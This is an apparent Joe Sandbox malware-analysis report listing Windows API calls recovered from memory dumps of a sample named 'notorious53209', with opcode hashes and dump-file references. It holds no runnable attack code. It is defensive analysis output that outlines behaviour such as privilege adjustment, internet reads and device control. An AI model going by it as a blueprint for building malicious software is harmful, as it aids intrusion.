                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                            • String ID:
                                            • API String ID: 1423138444-0
                                            • Opcode ID: 6d99a0475158a01ae19d490fdf994fa6b4e0eed24476805d1a1a54b97734b402
                                            • Instruction ID: 535bcde756c98f97a6bbbaf5af2f92b7ea2a7bb5fffc95135875937ec1277dcc
                                            • Opcode Fuzzy Hash: 6d99a0475158a01ae19d490fdf994fa6b4e0eed24476805d1a1a54b97734b402
                                            • Instruction Fuzzy Hash: 13318235610018AFCB26CF58DC98EFA7BBAEB49390F544169F9058B261C731AD60DF60
                                            APIs
                                              • Part of subcall function 00232612: GetWindowLongW.USER32(?,000000EB), ref: 00232623
                                            • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 002312D8
                                            • GetClientRect.USER32(?,?), ref: 0026B84B
                                            • GetCursorPos.USER32(?), ref: 0026B855
                                            • ScreenToClient.USER32(?,?), ref: 0026B860
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                            • String ID:
                                            • API String ID: 1010295502-0
                                            • Opcode ID: cfdb90c80745ffb90938d1d1eac09146f9200b5b332c9e16f1afaaacf3b6869f
                                            • Instruction ID: 3aaca4a215dc0fa1ae7d5b93a89c5a8beb0927d4083cc92a3b3d1f2ff3e6f51b
                                            • Opcode Fuzzy Hash: cfdb90c80745ffb90938d1d1eac09146f9200b5b332c9e16f1afaaacf3b6869f
                                            • Instruction Fuzzy Hash: 3D113A75920029AFCB10EF98DD899FF77B8EB05300F400566F911E7151C730BA718BA5
                                            APIs
                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0028EB19
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: lstrlen
                                            • String ID: ($|
                                            • API String ID: 1659193697-1631851259
                                            • Opcode ID: 0b0444afa6bb5e0dc7803dc9244bd78409447188425bbb5d18a414b8a5df7117
                                            • Instruction ID: 29eca54b9e8833d6876376a3d291534c65ed032d9f837a293137aeefaf205ad6
                                            • Opcode Fuzzy Hash: 0b0444afa6bb5e0dc7803dc9244bd78409447188425bbb5d18a414b8a5df7117
                                            • Instruction Fuzzy Hash: CD324778A107059FDB28DF19C48196AB7F0FF48310B12C46EE89ACB7A1D770E951CB40
                                            APIs
                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 002A26D5
                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 002A270C
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Internet$AvailableDataFileQueryRead
                                            • String ID:
                                            • API String ID: 599397726-0
                                            • Opcode ID: a9c71a544c44af1debb5d08d31b28cf7696cefc85a680094cd972be0693048d6
                                            • Instruction ID: 375765d58208b19452d0503650e04dea2210d8dc96c07210ac42dac3d1390829
                                            • Opcode Fuzzy Hash: a9c71a544c44af1debb5d08d31b28cf7696cefc85a680094cd972be0693048d6
                                            • Instruction Fuzzy Hash: 7241EC71924306FFDB20DE58DC85FBBB7BCEB41714F10406AFA01A6140DEB19E699B54
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 0029B5AE
                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0029B608
                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0029B655
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ErrorMode$DiskFreeSpace
                                            • String ID:
                                            • API String ID: 1682464887-0
                                            • Opcode ID: 870adf52625878a3139f7a48185b9104f44c04f068dd6647e0863f81824843e2
                                            • Instruction ID: 0d00ec3f44ab2ee4ec5eeb6134af5666fe0c8809fa142e08cc37e6de457c0193
                                            • Opcode Fuzzy Hash: 870adf52625878a3139f7a48185b9104f44c04f068dd6647e0863f81824843e2
                                            • Instruction Fuzzy Hash: E8215E75A20218EFCB00EF65EC84AADBBB8FF49310F1481A9E845AB351DB31A955CF51
                                            APIs
                                              • Part of subcall function 00250FF6: std::exception::exception.LIBCMT ref: 0025102C
                                              • Part of subcall function 00250FF6: __CxxThrowException@8.LIBCMT ref: 00251041
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00288D0D
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00288D3A
                                            • GetLastError.KERNEL32 ref: 00288D47
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                            • String ID:
                                            • API String ID: 1922334811-0
                                            • Opcode ID: 43f75e37f6edab7fe9e86be3037187ad3e9be2fdce534ad798e3b92d594c904d
                                            • Instruction ID: 6a250d73afdd188e9592253d257a814556e74e1f612af34a416c494345e8ddae
                                            • Opcode Fuzzy Hash: 43f75e37f6edab7fe9e86be3037187ad3e9be2fdce534ad798e3b92d594c904d
                                            • Instruction Fuzzy Hash: 4411B2B1424205AFD728AF64EC85D6BB7BCEB04711B10852EF84583691EF70BC508B20
                                            APIs
                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0029404B
                                            • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00294088
                                            • CloseHandle.KERNEL32(00000000), ref: 00294091
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CloseControlCreateDeviceFileHandle
                                            • String ID:
                                            • API String ID: 33631002-0
                                            • Opcode ID: 6884e4aee3abe424d1e73959b15417acf45f49a104c66b91cd99b46689457c6c
                                            • Instruction ID: efa7f1e711d884a7ca5a1b5caad159bcae074279025ce679f762d715e46115e3
                                            • Opcode Fuzzy Hash: 6884e4aee3abe424d1e73959b15417acf45f49a104c66b91cd99b46689457c6c
                                            • Instruction Fuzzy Hash: 5C1182B1D14229BEEB109BE8DC48FBFBBBCEB08750F000656BA04E7191D2B45D1587A1
                                            APIs
                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00294C2C
                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00294C43
                                            • FreeSid.ADVAPI32(?), ref: 00294C53
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                            • String ID:
                                            • API String ID: 3429775523-0
                                            • Opcode ID: 2161dcc34fb142dc413c2c37820dbc82c9fdb5af078bea598c6f8019270136cf
                                            • Instruction ID: 1d2de5e3081934381fed21b34bb4fc6184217185c96371d1b55d7a7d920e0fc4
                                            • Opcode Fuzzy Hash: 2161dcc34fb142dc413c2c37820dbc82c9fdb5af078bea598c6f8019270136cf
                                            • Instruction Fuzzy Hash: 2BF04F7591130DBFDF04DFF0DD89AADB7BCEF08301F004969A501E2191D6705A048B50
                                            APIs
                                            • __time64.LIBCMT ref: 00298B25
                                              • Part of subcall function 0025543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,002991F8,00000000,?,?,?,?,002993A9,00000000,?), ref: 00255443
                                              • Part of subcall function 0025543A: __aulldiv.LIBCMT ref: 00255463
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Time$FileSystem__aulldiv__time64
                                            • String ID: 0u/
                                            • API String ID: 2893107130-582192232
                                            • Opcode ID: 96157674bde54bc76e7f1f62fdeec0388d654bca42191cd19254ce5cb42c9d98
                                            • Instruction ID: fd0c3e29d034827445325b98e8ea834e8fc91c4a6b93a595c7a8a938058c1f9a
                                            • Opcode Fuzzy Hash: 96157674bde54bc76e7f1f62fdeec0388d654bca42191cd19254ce5cb42c9d98
                                            • Instruction Fuzzy Hash: 6821E4726355108FC729CF25E451A62B3E1EFA5321B288E6CD4E9CB2D0CA74B945CB94
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1643c05eb1fcb8e776e006a6c0a08a6c9fb6b30361eaaf9261b870450c122bc4
                                            • Instruction ID: 1edfcf3f0632d3cfad6505189827ae60840ff13d7976deab77557966185470d0
                                            • Opcode Fuzzy Hash: 1643c05eb1fcb8e776e006a6c0a08a6c9fb6b30361eaaf9261b870450c122bc4
                                            • Instruction Fuzzy Hash: C8228FB0A20216CFDF24DF54C480BBAB7B0FF14310F158569EC569B391D774A9A9CB91
                                            APIs
                                              • Part of subcall function 00232612: GetWindowLongW.USER32(?,000000EB), ref: 00232623
                                              • Part of subcall function 002325DB: GetWindowLongW.USER32(?,000000EB), ref: 002325EC
                                            • GetParent.USER32(?), ref: 0026BA0A
                                            • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,002319B3,?,?,?,00000006,?), ref: 0026BA84
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: LongWindow$DialogNtdllParentProc_
                                            • String ID:
                                            • API String ID: 314495775-0
                                            • Opcode ID: 32238c34b8bb87079dc387699ed7bbf93453cdb5ddbe1af9b6806a2ddf10a599
                                            • Instruction ID: b13d12a6b668f6852bd96681f4273c3a7b24006fbb99efed03ce249cc019ec1f
                                            • Opcode Fuzzy Hash: 32238c34b8bb87079dc387699ed7bbf93453cdb5ddbe1af9b6806a2ddf10a599
                                            • Instruction Fuzzy Hash: A321E774620105AFCB258F68CD88DB97BD6EF09360F584264F5259B2F2C731ADB1DB50
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?), ref: 0029C966
                                            • FindClose.KERNEL32(00000000), ref: 0029C996
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID:
                                            • API String ID: 2295610775-0
                                            • Opcode ID: aaee191343b03514bda9c1a6a9927681409dd0c64eda71fa02055cf885983050
                                            • Instruction ID: 7f3bac3b66735c4fde20caddb775e36bb7ff204325b964e779f8340c7489706d
                                            • Opcode Fuzzy Hash: aaee191343b03514bda9c1a6a9927681409dd0c64eda71fa02055cf885983050
                                            • Instruction Fuzzy Hash: 121165756206009FDB10EF29D849A2AF7E5FF45324F14865EF8A5D7291DB70AC10CF91
                                            APIs
                                              • Part of subcall function 00232612: GetWindowLongW.USER32(?,000000EB), ref: 00232623
                                            • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0026BB8A,?,?,?), ref: 002BC8E1
                                              • Part of subcall function 002325DB: GetWindowLongW.USER32(?,000000EB), ref: 002325EC
                                            • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 002BC8C7
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: LongWindow$DialogMessageNtdllProc_Send
                                            • String ID:
                                            • API String ID: 1273190321-0
                                            • Opcode ID: e878c94aee9447ce1271badfdfe95df1bcaf65634c23b13161313c00ac59210d
                                            • Instruction ID: 73764bb764e01387f3d8db5d6a5643ff2960c4839cdb823907aede495daa8e81
                                            • Opcode Fuzzy Hash: e878c94aee9447ce1271badfdfe95df1bcaf65634c23b13161313c00ac59210d
                                            • Instruction Fuzzy Hash: 8501D871210215ABDB225F14DC48EBA7BA6FF853A4F240138F9514B2E0CB716826EF91
                                            APIs
                                            • ClientToScreen.USER32(?,?), ref: 002BCC51
                                            • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0026BC66,?,?,?,?,?), ref: 002BCC7A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ClientDialogNtdllProc_Screen
                                            • String ID:
                                            • API String ID: 3420055661-0
                                            • Opcode ID: 63317663828aadcd352ebc09f7ecfe75845b4db17969045719ac8c4a2d2491f0
                                            • Instruction ID: 2c0855568c28607cc0872c5b652670516148c3f4cd61a948a85403b03ad1f7d8
                                            • Opcode Fuzzy Hash: 63317663828aadcd352ebc09f7ecfe75845b4db17969045719ac8c4a2d2491f0
                                            • Instruction Fuzzy Hash: 47F03A7241021CFFEF049F85ED099BE7FB9FB48361F10416AF905A2161D3716A60EBA0
                                            APIs
                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,002A977D,?,002BFB84,?), ref: 0029A302
                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,002A977D,?,002BFB84,?), ref: 0029A314
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ErrorFormatLastMessage
                                            • String ID:
                                            • API String ID: 3479602957-0
                                            • Opcode ID: 5f9be26d45125baf22587d55a8f77a335744118f2f628f0275632663db3734ae
                                            • Instruction ID: f5f47defb4de51a92b393145b63295da49e5065f672426271d110d238650c23b
                                            • Opcode Fuzzy Hash: 5f9be26d45125baf22587d55a8f77a335744118f2f628f0275632663db3734ae
                                            • Instruction Fuzzy Hash: 2EF0E23151432DABDB20AFA4CC49FEA736CBF08361F0042A5F808D2180D6309950CBE1
                                            APIs
                                            • GetWindowLongW.USER32(?,000000EC), ref: 002BCD74
                                            • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0026BBE5,?,?,?,?), ref: 002BCDA2
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
